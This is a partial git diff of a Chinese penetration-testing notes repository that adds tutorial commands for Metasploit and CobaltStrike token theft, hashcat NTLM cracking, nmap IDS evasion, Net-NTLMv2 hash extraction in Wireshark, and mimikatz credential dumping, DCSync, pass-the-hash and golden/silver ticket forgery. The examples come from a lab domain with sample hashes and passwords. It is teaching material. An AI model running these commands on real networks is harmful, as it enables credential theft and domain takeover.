-- [Attacking AWS: the full cyber kill chain](https://www.slideshare.net/wojdwo/attacking-aws-the-full-cyber-kill-chain-144590283)
+- [Attacking AWS: the full cyber kill chain](https://www.securing.biz/en/attacking-aws-the-full-cyber-kill-chain/index.html)
**工具**
- [toniblyx/prowler](https://github.com/toniblyx/prowler) - 用于 AWS 的实践评估,审计,强化和取证准备工具的命令行工具
@@ -1115,6 +1140,15 @@ DNS 协议属于 OSI 第七层,DNS 劫持指控制域名解析权限,比如
---
+### Azure
+
+**Azure AD**
+- **文章**
+ - [如何利用Azure获取活动目录信息](https://www.anquanke.com/post/id/158926)
+ - [What is Azure Active Directory?](https://adsecurity.org/?p=4211)
+
+---
+
### Serverless
**资源**
diff --git "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/MISC/HID-Digispark.md" "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/MISC/HID-Digispark.md"
index 2c1bb764..847382f7 100644
--- "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/MISC/HID-Digispark.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/MISC/HID-Digispark.md"
@@ -1,7 +1,7 @@
# HID-Digispark
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/DVWA-WalkThrough.md" "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/DVWA-WalkThrough.md"
index 7f589ef7..9d855baf 100644
--- "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/DVWA-WalkThrough.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/DVWA-WalkThrough.md"
@@ -1,7 +1,7 @@
# DVWA-WalkThrough
-
+
---
@@ -12,7 +12,7 @@
---
-**地址**
+**靶场项目地址**
- https://github.com/ethicalhack3r/DVWA
**知识点**
diff --git "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/pikachu-WalkThrough.md" "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/pikachu-WalkThrough.md"
index 332446ea..52716b0f 100644
--- "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/pikachu-WalkThrough.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/pikachu-WalkThrough.md"
@@ -12,7 +12,7 @@
优秀的 web 基础靶场,与 dvwa 相比 dvwa 更适合教学,pikachu 漏洞种类更多,建议通关顺序 dvwa --> pikachu
-**地址**
+**靶场项目地址**
- https://github.com/zhuifengshaonianhanlu/pikachu
**知识点**
diff --git "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/upload-labs-WalkThrough.md" "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/upload-labs-WalkThrough.md"
index 7804777e..da8fe944 100644
--- "a/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/upload-labs-WalkThrough.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\256\236\351\252\214/Misc/upload-labs-WalkThrough.md"
@@ -12,7 +12,7 @@
网上的文章写的很全了,主要点都有,没必要再发明轮子,在补充补充一些内容加深一下记忆
-**地址**
+**靶场项目地址**
- https://github.com/c0ny1/upload-labs
**环境要求**
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/BurpSuite.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/BurpSuite.md"
index 53f11ccb..ca2bf4db 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/BurpSuite.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/BurpSuite.md"
@@ -1,7 +1,7 @@
# Burp Suite
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/CobaltStrike.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/CobaltStrike.md"
index f02e8b21..49843bcb 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/CobaltStrike.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/CobaltStrike.md"
@@ -1,7 +1,7 @@
# CobaltStrike
-
+
---
@@ -38,6 +38,10 @@ cd csbruter
cat wordlist.txt | python3 csbruter.py xxx.xxx.xxx.xxx
```
+---
+
+### 安装及维护
+
**使用**
- 服务端
@@ -50,3 +54,14 @@ cat wordlist.txt | python3 csbruter.py xxx.xxx.xxx.xxx
或
`javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar`
+
+---
+
+### 权限提升
+
+**令牌假冒**
+
+当你获取了本地计算机的 system 权限后,如果这台机器上有域用户跑的进程,就直接可以窃取域账号的 token,然后从本地用户组跨入域环境。如果这台机器上有域管的开的进程,那么直接 steal token 后就可以登录域控了。
+```
+steal_token
+```
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Hashcat.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Hashcat.md"
index ccc5b755..e49365e7 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Hashcat.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Hashcat.md"
@@ -1,7 +1,7 @@
# Hashcat
-
+
---
@@ -83,6 +83,11 @@ hashcat --help
# 例子
+**查看爆破案例**
+```bash
+hashcat --example-hashes | less
+```
+
**爆破 drupal 7 的密码 hash**
```bash
@@ -103,3 +108,13 @@ pass01.txt 你的密码表
```bash
hashcat -m 2500 wireless.hccapx pass.txt --force
```
+
+**爆破 NTLM-hash**
+```bash
+hashcat -m 1000 hash.txt pass1.txt
+```
+
+**爆破 net-NTLMv2**
+```bash
+hashcat -m 5600 hash.txt pass1.txt
+```
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Kali.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Kali.md"
index 7124774e..80483672 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Kali.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Kali.md"
@@ -1,7 +1,7 @@
# Kali
-
+
---
@@ -196,7 +196,7 @@ dpkg -i Nessus-8.8.0-ubuntu1110_amd64.deb
**docker 部署**
-```
+```bash
docker run -d -p 3443:3443 -p 8834:8834 --name bobohacker -it yakoazz/bobohacker
```
- nesss地址 : https://127.0.0.1:8443 账号密码 bobohacker/bobohacker
@@ -205,6 +205,15 @@ docker run -d -p 3443:3443 -p 8834:8834 --name bobohacker -it yakoazz/bobohacke
---
+## rdesktop
+
+kali 自带
+```bash
+rdesktop <目标IP>
+```
+
+---
+
# 配置与设置
## apt
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Metasploit.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Metasploit.md"
index a7437ea2..dafd007e 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Metasploit.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Metasploit.md"
@@ -1,7 +1,7 @@
# Metasploit
-
+
---
@@ -171,6 +171,8 @@ getsystem # 命令可以提权到本地系统权限
sysinfo # 显示系统名,操作系统,架构和语言等.
```
+---
+
### 获取会话
**handler**
@@ -192,6 +194,8 @@ exploit -j # 后台执行
如果还不成功,切换回连端口或者改成 bind shell 试试
+---
+
### 信息收集
**截屏**
@@ -262,6 +266,8 @@ set pcapfile 1.cap
run
```
+---
+
### 权限提升
```bash
@@ -342,6 +348,23 @@ set session
Exploit
```
+**令牌假冒**
+
+在用户登录 windows 操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的 session 或者 cookie.
+
+msf 提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色.
+```bash
+getuid # 查看当前用户
+use incognito # 进入该模块
+list_tokens -u # 查看存在的令牌
+impersonate_token # 令牌假冒
+# 注意用户名的斜杠需要写两个.
+
+getuid # 查看是否切换成功
+```
+
+---
+
### 文件操作
**操作文件系统**
@@ -381,22 +404,9 @@ timestomp -v a.txt # 查看 a 的时间戳
timestomp a.txt -f b.txt # 使用 b 的时间覆盖 a 的时间
```
-### 横向
-
-**令牌假冒**
-
-在用户登录 windows 操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的 session 或者 cookie.
-
-msf 提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色.
-```bash
-getuid # 查看当前用户
-use incognito # 进入该模块
-list_tokens -u # 查看存在的令牌
-impersonate_token # 令牌假冒
-# 注意用户名的斜杠需要写两个.
+---
-getuid # 查看是否切换成功
-```
+### 横向
**域管理员嗅探**
@@ -406,6 +416,8 @@ set session 1
exploit
```
+---
+
### 端口转发和内网代理
**网络命令**
@@ -471,6 +483,8 @@ SRVPORT:监听的端口,默认为 1080.
直接运行 run 命令,就可以成功创建一个 socks4 代理隧道,在 linux 上可以配置 proxychains 使用,在 windows 可以配置 Proxifier 进行使用.
```
+---
+
### 权限维持
**关闭防病毒软件**
@@ -587,6 +601,8 @@ net user guest /active:yes
reg copy HkLM\sam\sam\domains\account\users\000001f4 HkLM\sam\sam\domains\account\users\000001f5
```
+---
+
### 痕迹清除
```bash
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Nmap.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Nmap.md"
index 3759cdf3..6aea09c3 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Nmap.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Nmap.md"
@@ -1,7 +1,7 @@
# Nmap
-
+
---
@@ -36,47 +36,47 @@
# 用法
-常用: `nmap -T5 -A -v -p- `
+常用 : `nmap -T5 -A -v -p- `
-TCP1:`nmap -Pn -sS --stats-every 3m --max-scan-delay 20 -T4 -p1-65535 ip -oN `
+TCP1 : `nmap -Pn -sS --stats-every 3m --max-scan-delay 20 -T4 -p1-65535 ip -oN `
-TCP2:`nmap -nvv -Pn -sSV -p --version-intensity 9 -A ip -oN `
+TCP2 : `nmap -nvv -Pn -sSV -p --version-intensity 9 -A ip -oN `
-UDP:`nmap -Pn --top-ports 1000 -sU --stats-every 3m -T3 ip -oN `
+UDP : `nmap -Pn --top-ports 1000 -sU --stats-every 3m -T3 ip -oN `
## 常用参数
```
--F 端口扫描
--sT tcp 端口扫描
--sU udp 扫描
--A 综合扫描
--O 系统扫描
--p 指定端口扫描
--T 优化时间 1-5 强度
--sV 端口对应的服务探测
--sP 发现扫描网络存活主机
--sS 半隐藏式隐蔽扫描
---iL 从主机/网络列表输入
---tr 路由跟踪模式
--P0 (无 ping)
--sP (Ping 扫描)
-
---script=vuln 利用脚本漏洞探测
---script=>>>>>>> 调用一个脚本
--oG nmap.txt 将结果保存到 nmap.txt
+-F 端口扫描
+-sT tcp 端口扫描
+-sU udp 扫描
+-A 综合扫描
+-O 系统扫描
+-p 指定端口扫描
+-T 优化时间 1-5 强度
+-sV 端口对应的服务探测
+-sP 发现扫描网络存活主机
+-sS 半隐藏式隐蔽扫描
+--iL 从主机/网络列表输入
+--tr 路由跟踪模式
+-P0 (无 ping)
+-sP (Ping 扫描)
+-iL 读取文件作为主机/网络列表
+-oN 将扫描输出到指定文件(包括报错)
+-oG 将扫描结果保存到指定文件(仅结果信息)
+--script= 利用脚本漏洞探测
```
**返回值**
```
-|返回状态 |说明
-| ----------------- |-----
-|open |端口开启,数据有到达主机,有程序在端口上监控
-|close |端口关闭,数据有到达主机,没有程序在端口上监控
-|filtered |未到达主机,返回的结果为空,被防火墙或IDS过滤
-|unfiltered |到达主机,但是不能识别端口当前状态
-|open\|filtered |端口没有返回值,主要发生在UDP,IP,FIN,NULL和Xmas扫描
-|closed\|filtered |只发生在IP,ID,idle扫描
+| 返回状态 | 说明
+| ----------------- | -----
+| open | 端口开启,数据有到达主机,有程序在端口上监控
+| close | 端口关闭,数据有到达主机,没有程序在端口上监控
+| filtered | 未到达主机,返回的结果为空,被防火墙或 IDS 过滤
+| unfiltered | 到达主机,但是不能识别端口当前状态
+| open\|filtered | 端口没有返回值,主要发生在 UDP,IP,FIN,NULL 和 Xmas 扫描
+| closed\|filtered | 只发生在 IP,ID,idle 扫描
```
---
@@ -124,6 +124,7 @@ nmap 默认发送一个 ARP 的 PING 数据包,来探测目标主机 1-10000 范
`nmap -vv -p1-100 -O `
**用一组 IP 地址掩盖真实地址**
+
`namp -D `
**伪装 MAC 地址**
@@ -157,6 +158,35 @@ nmap 默认发送一个 ARP 的 PING 数据包,来探测目标主机 1-10000 范
- 欺骗 ip 和 mac 地址,不能跨网段
- `nmap -v -Pn -n -S 192.168.100.101 -e eth0 --spoof-mac 0 --min-hostgroup 1024 --min-parallelism 1024 -f 192.168.100.1/24 -oN /root/1.txt`
+参考 : https://github.com/al0ne/Nmap_Bypass_IDS
+
+- nmap 系统识别绕过 ids 检测
+ - 修改 [osscan2.cc](https://github.com/nmap/nmap/blob/master/osscan2.cc)
+
+ 将 `static u8 patternbyte = 0x43; /* character 'C' /` ,替换为 `static u8 patternbyte = 0x46; / character 'F' */`
+
+- nmap UA 修改
+ - 修改 [nselib/http.lua](https://github.com/nmap/nmap/blob/master/nselib/http.lua)
+
+ `USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)""`
+
+- TCP window 修改tcp window 窗口大小
+ - 修改 [tcpip.cc](https://github.com/nmap/nmap/blob/master/tcpip.cc)
+
+ 将 `tcp->th_win = htons(1024);` ,替换为 `tcp->th_win = htons(10240);`
+
+- 修改 3389 cookie
+ - 修改 [nselib/rdp.lua](https://github.com/nmap/nmap/blob/master/nselib/rdp.lua)
+
+ `local cookie = "mstshash=nmap"`
+
+- Zmap识别
+ - 修改 [src/probe_modules/packet.c](https://github.com/zmap/zmap/blob/master/src/probe_modules/packet.c)
+ ```
+ tcp_header->th_win = htons(65535);
+ iph->ip_id = htons(54321);
+ ```
+
---
### 常见
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/SET.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/SET.md"
index 300e2559..1daff4b8 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/SET.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/SET.md"
@@ -1,7 +1,7 @@
# SET
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sqlmap.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sqlmap.md"
index 33cb0faf..8015bd3d 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sqlmap.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sqlmap.md"
@@ -1,7 +1,7 @@
# Sqlmap
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sysmon.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sysmon.md"
index 955c1908..46b8fb7c 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sysmon.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Sysmon.md"
@@ -1,7 +1,7 @@
# Sysmon
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wfuzz.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wfuzz.md"
index ffe10c19..b05b281f 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wfuzz.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wfuzz.md"
@@ -1,7 +1,7 @@
# Wfuzz
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark.md"
index eceb48b8..d05b64bd 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/Wireshark.md"
@@ -1,9 +1,11 @@
# Wireshark
-
+
+> 注 : 笔记中流量包 pcapng 源文件在其图片目录下
+
---
## 免责声明
@@ -28,8 +30,9 @@
- [CaptureSetup/USB - The Wireshark Wiki](https://wiki.wireshark.org/CaptureSetup/USB)
- [图解Wireshark协议分析实例](https://blog.csdn.net/bcbobo21cn/article/details/51454170)
-**插件**
+**插件/增强工具**
- [pentesteracademy/patoolkit](https://github.com/pentesteracademy/patoolkit) - Wireshark 插件,增强分析能力
+- [leolovenet/qqwry2mmdb](https://github.com/leolovenet/qqwry2mmdb) - 为 Wireshark 能使用纯真网络 IP 数据库(QQwry)而提供的格式转换工具,不支持 windows
---
@@ -209,6 +212,8 @@ udp contains 7c:7c:7d:7d # 匹配 payload 中含有 0x7c7c7d7d 的 UDP 数据
# 案例
+**SampleCaptures**
+
案例来自 [[SampleCaptures - The Wireshark Wiki](https://wiki.wireshark.org/SampleCaptures#MPTCP)]
下载 [iperf-mptcp-0-0.pcap](https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=iperf-mptcp-0-0.pcap)
@@ -256,3 +261,46 @@ TCP 重传的机制:指数后退,比如第一次等待 1s,第二次等 待
点击 统计 -- I/O 图表
![](../../../assets/img/安全/工具/Wireshark/9.png)
+
+**NTLMv2**
+
+192.168.141.1(WIN10)——>192.168.141.139(WIN2008)
+
+![](../../../assets/img/安全/工具/Wireshark/10.png)
+
+查看第一个数据包协商
+
+![](../../../assets/img/安全/工具/Wireshark/11.png)
+
+查看第二个数据包质询,获得 Challenge
+
+![](../../../assets/img/安全/工具/Wireshark/12.png)
+
+查看第三个数据包身份验证,其中可以获得客户端加密后的 Challenge
+
+![](../../../assets/img/安全/工具/Wireshark/13.png)
+
+- username(要访问服务器的用户名):Administrator
+- domain(访问者主机名或者 ip):DESKTOP-QKM4NK7
+- challenge(数据包 2 中服务器返回的 challenge 值):18f77b6fe9f8d876
+- HMAC-MD5(数据包 3 中的 NTProofStr): 0ecfccd87d3bdb81713dc8c07e6705b6
+- blob(blob 对应数据为 NTLMv2 Response 开头去掉 NTProofStr 的后半部分):01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000
+
+所以构造,Net-NTLM v2 Hash 值为:
+```
+Administrator::DESKTOP-QKM4NK7:18f77b6fe9f8d876:0ecfccd87d3bdb81713dc8c07e6705b6:01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000
+```
+
+**域环境中 NTLM 认证方式**
+
+192.168.141.140(WIN2008)——>192.168.141.135(WIN2008)
+
+域控 : 192.168.141.139
+
+FQDN : ffffffff0x.com
+
+账号密码:Administrator Abcd1234
+
+![](../../../assets/img/安全/工具/Wireshark/14.png)
+
+![](../../../assets/img/安全/工具/Wireshark/15.png)
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/aircrack.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/aircrack.md"
index 993eccdc..b58639e8 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/aircrack.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/aircrack.md"
@@ -1,7 +1,7 @@
# Aircrack
-
+
---
diff --git "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz.md" "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz.md"
index fe226858..af0baf16 100644
--- "a/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz.md"
+++ "b/1earn/\345\256\211\345\205\250/\345\267\245\345\205\267/mimikatz.md"
@@ -1,7 +1,7 @@
# mimikatz
-
+
---
@@ -203,9 +203,43 @@ lsadump::sam /system:system.hiv /sam:sam.hiv /security:security.hiv
---
-# 哈希传递
+# NTDS.DIT
-**文章**
+使用 Mimikatz 提取 Active Directory hash
+```
+privilege::debug
+mimikatz lsadump::lsa /inject exit
+sekurlsa::minidump c:\temp\lsass.dmp 使用 Mimikatz 转储 LSASS 内存
+sekurlsa::logonpasswords
+```
+
+**DCSync**
+
+Mimikatz 有一个功能(dcsync),利用目录复制服务(DRS)从 NTDS.DIT 文件中检索密码哈希值。该技术消除了直接从域控制器进行认证的必要性,因为它可以从域管理员环境中属于域的任意系统执行。
+
+运行 DCSync 需要特殊权限。管理员,域管理员或企业管理员以及域控制器计算机帐户的任何成员都能够运行 DCSync 来提取密码数据。请注意,只读域控制器不仅可以默认为用户提取密码数据。
+```
+privilege::debug
+lsadump::dcsync /domain:ffffffff0x.com /all /csv
+```
+
+通过使用 /user 参数指定域用户名,Mimikatz 会将该指定用户的所有帐户信息转储包括哈希值。
+```
+lsadump::dcsync /domain:ffffffff0x.com /user:krbtgt
+lsadump::dcsync /domain:ffffffff0x.com /user:test
+```
+
+可以直接在域控制器中执行 Mimikatz,通过 lsass.exe 进程 dump 密码哈希
+```
+privilege::debug
+lsadump::lsa /inject
+```
+
+---
+
+# PTH
+
+**相关文章**
- [mimikatz-pth with rdp](http://rtshield.top/2019/08/31/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7-mimikatz-pth_with_rdp/)
- https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth
- [Passing the hash with native RDP client (mstsc.exe)](https://edermi.github.io/post/2018/native_rdp_pass_the_hash/)
@@ -259,7 +293,12 @@ lsadump::sam /system:system.hiv /sam:sam.hiv /security:security.hiv
2. 通过 pth 进行远程登录(cmd)
```
+ mimikatz.exe privilege::debug
+ mimikatz.exe sekurlsa::logonpasswords
+
mimikatz.exe privilege::debug "sekurlsa::pth /domain:目标机器的域(工作组则为.) /user:目标机器的用户名 /ntlm:用户名对应的hash"
+
+ mimikatz.exe privilege::debug "sekurlsa::pth /user:win10 /domain:test.com /ntlm:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
```
3. 通过 pth 进行远程登录(mstsc)
@@ -269,3 +308,107 @@ lsadump::sam /system:system.hiv /sam:sam.hiv /security:security.hiv
```
RDP 限制管理模式是建立在 Kerberos 基础上的。看一下网络流量,可以看到 RDP 客户端代表模拟的用户请求 ticket,这没有问题,因为我们只需要通过哈希来验证 Kerberos。
+
+---
+
+# PTT
+## Silver_Tickets
+
+导出 Server Hash
+```
+mimikatz.exe "privilege::debug” "sekurlsa::logonpasswords" "exit" > log.txt
+```
+
+使用 mimikatz 伪造白银票据:
+```
+mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4: /user:<用户名> /ptt" exit
+```
+
+**例子:访问域控上的 cifs 服务(Windoiws 主机间的文件共享)**
+
+在域控上执行以下命令获取本地账户 NTLM Hash 和 SID
+
+```
+mimikatz.exe "privilege::debug” "sekurlsa::logonpasswords" "exit" > log.txt
+```
+
+![](../../../assets/img/安全/工具/mimikatz/1.png)
+
+然后将生成白银票据注入到内存中,并查看票据生成情况。查看目标的文件共享服务成功:
+```
+kerberos::golden /domain:ffffffff0x.com /sid:S-1-5-21-1112871890-2494343973-3486175548 /target:WIN-A5GPDCPJ7OT.ffffffff0x.com /rc4:f9ca454a3544172034a8666a79eda95e /service:cifs /user:test /ptt
+
+// 这里的 cifs 是指的文件共享服务,有了 cifs 服务权限,就可以访问域控制器的文件系统
+```
+
+访问测试
+
+![](../../../assets/img/安全/工具/mimikatz/2.png)
+
+---
+
+## Golden_Tickets
+
+登录域控抓取 krbtgt 的密码 Hash 和获取域 SID
+```
+mimikatz.exe log "lsadump::dcsync /domain:<域名> /user:krbtgt"
+```
+
+使用 mimikatz 伪造的黄金票据:
+```
+kerberos::golden /user:<用户名> /domain:<域名> /sid:<域SID> /krbtgt: /ticket:test.kiribi
+```
+
+利用 mimikatz 的 kerberos::ptt 将黄金票据 test.kiribi 注入到内存中:
+```
+// 清除缓存的票据
+kerberos::purge
+
+// 注入黄金票据 test.kiribi
+kerberos::ptt test.kiribi
+
+// 列出票据
+kerberos::list
+```
+
+> 导入的票据在20分钟内有效,过期之后再次导入就行
+
+现在可以访问域控共享目录,还能在 DC 上远程执行 psexec
+
+但是需要注意的是用 psexec 远程执行命令的时候,需要不能使用 IP 访问。使用 NetBios 的服务名访问才会走 Kerberos 认证,达到伪造凭据的攻击
+
+**例子**
+
+在数据库服务器上,利用域管理员的权限获得 krbtgt 的 NTLM 哈希 和 SID
+
+使用 Mimikatz 抓取 Krbtgt 账号的密码
+```
+mimikatz.exe "lsadump::dcsync /domain:ffffffff0x.com /user:krbtgt" > log.txt
+```
+
+![](../../../assets/img/安全/工具/mimikatz/3.png)
+
+得到 krbtgt 哈希之后,使用 mimikatz 的 `kerberos::golden` 生成黄金票据 `test.kiribi`:
+```
+kerberos::golden /user:administrator /domain:FFFFFFFF0X.com /sid:S-1-5-21-1112871890-2494343973-3486175548 /krbtgt:743093920acd8d427323c24c0e2c52c2 /ticket:test.kiribi
+```
+`/admin` 为伪造的用户名,用户名可以任意伪造 `/domain` 为目标的域名 `/sid` 为目标域名的 SID `/krbtgt` 为 krbtgt 账户密码的 NTLM Hash `/ticket` 为要伪造的黄金票据的名称
+
+注入黄金票据
+```
+kerberos::ptt test.kiribi
+```
+
+访问测试
+
+![](../../../assets/img/安全/工具/mimikatz/4.png)
+
+---
+
+# PTK
+
+```
+mimikatz "privilege::debug" "sekurlsa::ekeys"
+
+mimikatz "privilege::debug" "sekurlsa::pth /user:test /domain:test.com /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288"
+```
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\345\272\224\346\200\245.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\345\272\224\346\200\245.md"
index cb3f9da2..173cf75a 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\345\272\224\346\200\245.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\345\272\224\346\200\245.md"
@@ -155,6 +155,7 @@
## Web层面
+**URL 分析 && Passive DNS**
- [URL 分析 && Passive DNS](./监察.md#URL分析-PassiveDNS)
### 暗链
@@ -165,15 +166,25 @@
2. 搜索引擎 : `黑产关键字+site:"网站域名"`,查看更多 [黑产seo关键词](../RedTeam/搜索引擎Hacking.md#google)
3. 用工具批量爬取网站外链查看有无关键字
-**在线工具**
+**在线检测工具**
- [友情链接查询,友情链接检测](http://link.chinaz.com/)
- [网站被黑检测](http://s.tool.chinaz.com/Tools/webcheck.aspx)
- [云悉监测验证工具](http://check.yunsee.cn/)
-**文章**
+**相关文章**
- [关于黑产暗链的分析与看法](https://mp.weixin.qq.com/s/wAGd3Wu5QoqjYFhh2WdAHw)
-- [【黑帽SEO系列】网页劫持 ](https://thief.one/2016/10/12/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E7%BD%91%E9%A1%B5%E5%8A%AB%E6%8C%81/)
- [Dark_chain_detection](https://github.com/7ym0n/security/blob/master/Web/Dark_chain_detection.md)
+- [黑产相关信息挖掘初探学习笔记](https://blog.fullstackpentest.com/black-hat-seo-preliminary-study.html)
+- [【黑帽SEO系列】基础知识](https://thief.one/2016/10/09/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/)
+- [【黑帽SEO系列】页面跳转](https://thief.one/2016/10/10/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E9%A1%B5%E9%9D%A2%E8%B7%B3%E8%BD%AC/)
+- [【黑帽SEO系列】网页劫持 ](https://thief.one/2016/10/12/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E7%BD%91%E9%A1%B5%E5%8A%AB%E6%8C%81/)
+- [【黑帽SEO系列】暗链](https://thief.one/2016/10/12/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E6%9A%97%E9%93%BE/)
+- [黑帽SEO剖析之手法篇](https://thief.one/2017/09/28/1/)
+- [黑帽SEO剖析之工具篇](https://thief.one/2017/09/28/2/)
+- [黑帽SEO剖析之隐身篇](https://thief.one/2017/09/28/3/)
+- [黑帽SEO剖析之总结篇](https://thief.one/2017/09/28/4/)
+
+---
### webshell后门
